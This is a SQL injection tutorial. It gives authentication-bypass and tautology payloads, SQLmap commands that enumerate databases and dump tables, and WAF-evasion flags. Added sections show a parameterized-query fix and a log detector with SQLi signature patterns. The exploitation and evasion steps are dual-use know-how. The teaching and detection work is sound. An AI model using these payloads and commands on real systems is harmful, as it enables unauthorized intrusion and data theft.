SQL Injection
Introduction to SQL Injection
SQL Injection (SQLi) is a common web application vulnerability that allows attackers to interfere with the queries an application makes to its database. By injecting malicious SQL statements into a form field or URL parameter, attackers can gain unauthorized access to data, manipulate database entries, or even execute commands on the server.
SQL Injection attacks are illegal without permission. You should only test systems you have authorization to assess. Unauthorized testing can lead to severe legal consequences.
Types of SQL Injection
- In-band SQLi: The attacker is able to use the same communication channel to both inject the malicious SQL commands and retrieve results. The most common types are:
  - Error-based SQLi: Relies on error messages returned by the database.
  - Union-based SQLi: Leverages the UNION SQL operator to combine multiple select queries.
- Inferential SQLi (Blind SQLi): The attacker does not receive direct feedback from the database but infers the database's response by analyzing the behavior of the application. This can be:
  - Boolean-based SQLi: Exploits the fact that the SQL query's result will alter the behavior of the application depending on the query's truth value.
  - Time-based SQLi: Manipulates the database to delay its responses, allowing the attacker to infer data based on the response time.
- Out-of-band SQLi: The attacker relies on external server responses (such as DNS or HTTP requests) to exfiltrate data.
Example of SQL Injection
Let's assume we have a vulnerable login form where the backend SQL query looks like this:
SELECT * FROM users WHERE username = 'input_username' AND password = 'input_password';
An attacker could submit the following input:
- input_username: ' OR 1=1 --
- input_password: anything
This modifies the SQL query to:
SELECT * FROM users WHERE username = '' OR 1=1 --' AND password = 'anything';
In this case, 1=1 is always true, and the -- turns the rest of the line, including the password check, into a comment, allowing the attacker to bypass authentication.
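The following is an added example (not part of the original page) that runs the login query above against an in-memory SQLite database with a constructed users table. It shows the string-concatenated query being bypassed by the ' OR 1=1 -- input, and the same input failing against the parameterized form of the query, which is the standard fix: the driver passes the input as data, so the quote, OR and -- are never parsed as SQL. The table contents and function names are assumptions made for the demonstration.

```python
import sqlite3

# Constructed sample data for the demonstration (not from the original page).
SAMPLE_USERS = [
    ("alice", "correct horse battery staple"),
    ("bob", "hunter2"),
]


def make_db():
    """Create an in-memory SQLite database with the constructed users table."""
    conn = sqlite3.connect(":memory:")
    conn.execute("CREATE TABLE users (username TEXT, password TEXT)")
    conn.executemany("INSERT INTO users VALUES (?, ?)", SAMPLE_USERS)
    return conn


def login_vulnerable(conn, username, password):
    """The pattern from the page: user input spliced straight into the SQL string.
    Returns the matching rows; a non-empty result means 'login succeeded'."""
    query = (
        f"SELECT * FROM users WHERE username = '{username}' "
        f"AND password = '{password}';"
    )
    return conn.execute(query).fetchall()


def login_parameterized(conn, username, password):
    """The fix: a parameterized query. The driver sends the input as data,
    so quotes, OR and -- inside it are compared literally, never parsed as SQL."""
    query = "SELECT * FROM users WHERE username = ? AND password = ?;"
    return conn.execute(query, (username, password)).fetchall()


def demo():
    """Return (rows from vulnerable login, rows from parameterized login,
    rows for a legitimate user) for the payload shown on the page."""
    conn = make_db()
    payload_user = "' OR 1=1 --"
    payload_pass = "anything"
    # Vulnerable version: -- comments out the password check and 1=1 is always
    # true, so every row comes back and the attacker is 'logged in'.
    vuln_rows = login_vulnerable(conn, payload_user, payload_pass)
    # Parameterized version: the payload is matched literally against the
    # username column, matches nothing, and the login fails.
    safe_rows = login_parameterized(conn, payload_user, payload_pass)
    # A legitimate user still authenticates through the parameterized version.
    legit_rows = login_parameterized(conn, "bob", "hunter2")
    return len(vuln_rows), len(safe_rows), len(legit_rows)


if __name__ == "__main__":
    print(demo())  # (2, 0, 1)
```

The same split applies to any driver: build the statement with placeholders and hand the values to execute(), and never concatenate request input into the query text.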
SQL Injection Tutorial
This tutorial will guide you through identifying and exploiting SQL injection vulnerabilities using SQLmap, a popular open-source tool.
Step 1: Identifying a Vulnerable Parameter
Use a basic SQL injection payload to test if a web application's parameter is vulnerable. For example, on a URL like this:
http://example.com/page.php?id=1
Try modifying the id parameter to:
http://example.com/page.php?id=1' OR '1'='1
Step 2: Installing SQLmap
SQLmap comes pre-installed on Kali Linux. On other systems it can be installed via Git:
git clone https://github.com/sqlmapproject/sqlmap.git
cd sqlmap
On Kali Linux, you don't need to type python sqlmap.py in the command line; the command has been aliased to sqlmap.
Step 3: Running a Basic Scan
python sqlmap.py -u "http://example.com/page.php?id=1" --dbs
- -u specifies the URL to test.
- --dbs enumerates the databases.
Step 4: Extracting Data
Once SQLmap confirms that the parameter is vulnerable, you can extract specific data from the database. For example, to extract data from a specific table:
python sqlmap.py -u "http://example.com/page.php?id=1" -D database_name -T table_name --dump
- -D specifies the database name.
- -T specifies the table name.
- --dump extracts all the data from the specified table.
Step 5: Avoiding Detection
To avoid detection by web application firewalls (WAFs), SQLmap allows you to use various evasion techniques, such as encoding payloads or delaying requests:
python sqlmap.py -u "http://example.com/page.php?id=1" --random-agent --delay=2 --hex
- --random-agent: Randomizes the user agent in each request.
- --delay: Adds a delay between each request to avoid triggering rate limits.
- --hex: Encodes the payload in hexadecimal to evade detection.
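From the defender's side, the flags above matter because they remove the two cheapest detection signals: --random-agent defeats matching on the tool's default user agent, and --delay keeps request rates below simple thresholds. What survives is the payload itself. The following is an added example (not part of the original page or of SQLmap) that parses constructed Apache combined-format log lines, URL-decodes the request path, and flags the payload shapes this page shows (the ' OR '1'='1 tautology, UNION SELECT, and a trailing comment marker) as well as the default user agent, then reports sources that trigger several distinct rules. The log lines, rule names and thresholds are assumptions made for the demonstration.

```python
import re
from urllib.parse import unquote_plus

# Constructed sample log lines in Apache combined format (not real traffic).
SAMPLE_LOG = """\
10.0.0.5 - - [01/Jan/2024:10:00:01 +0000] "GET /page.php?id=1 HTTP/1.1" 200 512 "-" "Mozilla/5.0"
10.0.0.9 - - [01/Jan/2024:10:00:02 +0000] "GET /page.php?id=1%27%20OR%20%271%27%3D%271 HTTP/1.1" 200 4096 "-" "Mozilla/5.0"
10.0.0.9 - - [01/Jan/2024:10:00:04 +0000] "GET /page.php?id=1%20UNION%20SELECT%20NULL,NULL-- HTTP/1.1" 500 210 "-" "Mozilla/5.0 (compatible; MSIE 9.0)"
10.0.0.9 - - [01/Jan/2024:10:00:06 +0000] "GET /page.php?id=1 HTTP/1.1" 200 512 "-" "sqlmap/1.7"
10.0.0.7 - - [01/Jan/2024:10:00:07 +0000] "GET /login.php?user=o%27brien HTTP/1.1" 200 300 "-" "Mozilla/5.0"
"""

# Apache combined log format: ip ident user [time] "method path proto" status size "referer" "ua"
LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] "(?P<method>\S+) (?P<path>\S+) [^"]*" '
    r'(?P<status>\d{3}) \S+ "[^"]*" "(?P<ua>[^"]*)"$'
)

# Signatures for the payload shapes shown on this page, applied to the decoded path.
PAYLOAD_RULES = [
    ("tautology", re.compile(r"'\s*or\s+'?\d+'?\s*=\s*'?\d+", re.I)),
    ("union_select", re.compile(r"\bunion\b[\s/*]+\bselect\b", re.I)),
    ("comment_terminator", re.compile(r"(--|#|/\*)\s*$")),
]
# Default tool user agent; unreliable on its own once --random-agent is in use.
UA_RULE = re.compile(r"sqlmap", re.I)


def analyse(log_text):
    """Return a list of (ip, decoded_path, [rule names]) for lines that match
    at least one rule; lines with no findings are skipped."""
    findings = []
    for line in log_text.splitlines():
        m = LOG_RE.match(line)
        if not m:
            continue  # constructed input is well formed; real logs need error handling
        # Decode percent-encoding so %27%20OR%20 is inspected as ' OR
        decoded = unquote_plus(m.group("path"))
        hits = [name for name, rx in PAYLOAD_RULES if rx.search(decoded)]
        if UA_RULE.search(m.group("ua")):
            hits.append("sqlmap_user_agent")
        if hits:
            findings.append((m.group("ip"), decoded, hits))
    return findings


def suspicious_sources(findings, threshold=2):
    """IPs that triggered at least `threshold` distinct rules. One odd request
    (an apostrophe in a surname) can be a false positive; several different
    payload shapes from one source within a short window rarely are."""
    per_ip = {}
    for ip, _, hits in findings:
        per_ip.setdefault(ip, set()).update(hits)
    return sorted(ip for ip, rules in per_ip.items() if len(rules) >= threshold)


if __name__ == "__main__":
    found = analyse(SAMPLE_LOG)
    for ip, path, hits in found:
        print(ip, path, hits)
    print(suspicious_sources(found))  # ['10.0.0.9']
```

The o'brien request is the deliberate control: a single quote in legitimate input must not by itself trip the rules, which is why the tautology signature requires the quote, OR and a comparison together, and why the per-source threshold counts distinct rule types rather than raw matches.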
Conclusion
SQL Injection is a powerful attack vector, and tools like SQLmap make it easier to exploit vulnerable systems. However, it’s crucial to remember that ethical guidelines must always be followed. Testing without permission is illegal and unethical. Always ensure that you are operating within the boundaries of the law and with explicit consent.